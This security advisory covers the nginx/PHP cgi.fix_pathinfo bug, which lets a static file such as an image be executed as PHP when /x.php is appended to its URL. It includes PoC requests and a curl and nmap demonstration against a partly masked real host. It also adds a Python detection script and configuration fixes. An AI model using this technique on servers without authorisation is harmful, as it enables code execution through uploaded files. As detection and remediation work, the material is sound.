Please check your server.
PoC:

Request http://testsite/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

Request http://testsite/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6
The change in Content-Type (text/plain to text/html, with X-Powered-By: PHP appearing) shows that a different backend handled the second request: nginx matched the trailing .php and passed the URI to FastCGI, and PHP (with cgi.fix_pathinfo=1) walked the path back to the existing file robots.txt and executed it as a PHP script. A site that behaves this way is likely vulnerable: any file an attacker can upload (for example an image containing PHP code) can then be executed by appending /anything.php to its URL.

Demonstration:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx web server 0.8.15
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png -# | grep "Content-Type"
Content-Type: image/png
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png/test.php -# | grep "Content-Type"
Content-Type: text/html
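The following is an added example, not part of the 80sec advisory or its references: a small Python script that automates the two-request test from the PoC and the demonstration above. It compares the Content-Type of a static file with that of the same path plus a bogus /80sec.php suffix; a 200 on both with the type changing to text/html (or PHP announcing itself in X-Powered-By) means PHP parsed the static file. The embedded sample headers are constructed from the PoC above, the probe suffix /80sec.php is a placeholder, and the live check only needs the standard library.

```python
"""Check for the nginx + PHP path-info (cgi.fix_pathinfo) parsing bug.

Added example for this advisory, not 80sec's own tooling. Standard library only.
Logic follows the advisory: fetch a static file, then the same path with a bogus
"/x.php" appended; if both return 200 but the Content-Type changes to text/html
(or PHP shows up in X-Powered-By), PHP executed the static file.
"""
import http.client
from urllib.parse import urlsplit

# Constructed sample responses modelled on the advisory's PoC headers (not captured live).
BASE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.6.32\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 18\r\n"
    "\r\n"
)
PROBE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.6.32\r\n"
    "Content-Type: text/html\r\n"
    "X-Powered-By: PHP/5.2.6\r\n"
    "\r\n"
)
# What a fixed server answers for the probe: the bogus path is simply not found.
SAFE_PROBE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: nginx/0.6.32\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Return (status_code, {lower-cased name: value}) from raw HTTP/1.x response text."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def media_type(headers):
    """Content-Type without parameters: 'text/html; charset=utf-8' -> 'text/html'."""
    return headers.get("content-type", "").split(";", 1)[0].strip().lower()


def looks_vulnerable(base_raw, probe_raw):
    """True if the /x.php probe turned a static response into a PHP-parsed one."""
    base_status, base_headers = parse_headers(base_raw)
    probe_status, probe_headers = parse_headers(probe_raw)
    if base_status != 200 or probe_status != 200:
        return False  # static file missing, or the bogus .php path was rejected
    if media_type(base_headers) == media_type(probe_headers):
        return False  # no handler change visible; use a non-HTML base file (txt, png)
    php_banner = "php" in probe_headers.get("x-powered-by", "").lower()
    return media_type(probe_headers) == "text/html" or php_banner


def fetch_head(url, timeout=10):
    """HEAD request; returns the response rebuilt as raw header text for parse_headers()."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        conn.request("HEAD", parts.path or "/")
        resp = conn.getresponse()
        lines = [f"HTTP/1.1 {resp.status} {resp.reason}"]
        lines += [f"{name}: {value}" for name, value in resp.getheaders()]
        return "\r\n".join(lines) + "\r\n\r\n"
    finally:
        conn.close()


def check_live(static_url, suffix="/80sec.php"):
    """Run the advisory's two-request test against a real host (network access required)."""
    return looks_vulnerable(fetch_head(static_url), fetch_head(static_url + suffix))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # e.g. python check_pathinfo.py http://testsite/robots.txt
        print("likely vulnerable" if check_live(sys.argv[1]) else "not detected")
    else:
        # Offline run over the constructed samples.
        print("sample PoC headers:", looks_vulnerable(BASE_RESPONSE, PROBE_RESPONSE))
        print("fixed server:", looks_vulnerable(BASE_RESPONSE, SAFE_PROBE_RESPONSE))
```

Pick a base file whose Content-Type is not text/html (robots.txt or a PNG, as in the advisory), otherwise the comparison cannot tell nginx and PHP apart. To fix an affected server, set cgi.fix_pathinfo = 0 in php.ini, or stop nginx from handing non-existent files to FastCGI by adding try_files $uri =404; inside the location that matches \.php$.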
References:
[1] http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html
[2] http://www.laruence.com/2010/05/20/1495.html